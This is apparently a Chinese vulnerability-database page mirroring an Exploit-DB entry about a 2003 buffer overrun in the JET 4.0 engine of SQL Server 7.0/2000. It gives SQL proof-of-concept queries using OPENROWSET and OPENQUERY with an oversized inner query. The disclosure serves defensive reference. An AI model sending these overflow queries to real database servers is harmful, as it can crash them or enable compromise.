Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 – Buffer Overrun

Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 – Buffer Overrun

漏洞ID 1053866 漏洞类型
发布时间 2003-05-09 更新时间 2003-05-09
图片[1]-Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 – Buffer Overrun-安全小百科CVE编号 N/A
图片[2]-Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 – Buffer Overrun-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22576
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7541/info

Microsoft SQL Server is prone to an exploitable buffer overrun vulnerability via the Jet Database Engine. This can occur while the JET 4.0 OLE DB data provider is querying data supplied via a remote source and is due to insufficient bounds checking of parameters of heterogeneous or ad hoc query methods.

select * from openrowset('microsoft.jet.oledb.4.0','c:anydatabase.mdb';'admin';'','select XXX...()')

or

select * from Openquery(SomeJet40LinkedServer,'Select XXX...()')


(where XXX... is more than 276 chars)

相关推荐: AutoLog IP Spoofing Vulnerability

AutoLog IP Spoofing Vulnerability 漏洞ID 1102152 漏洞类型 Design Error 发布时间 2002-04-29 更新时间 2002-04-29 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享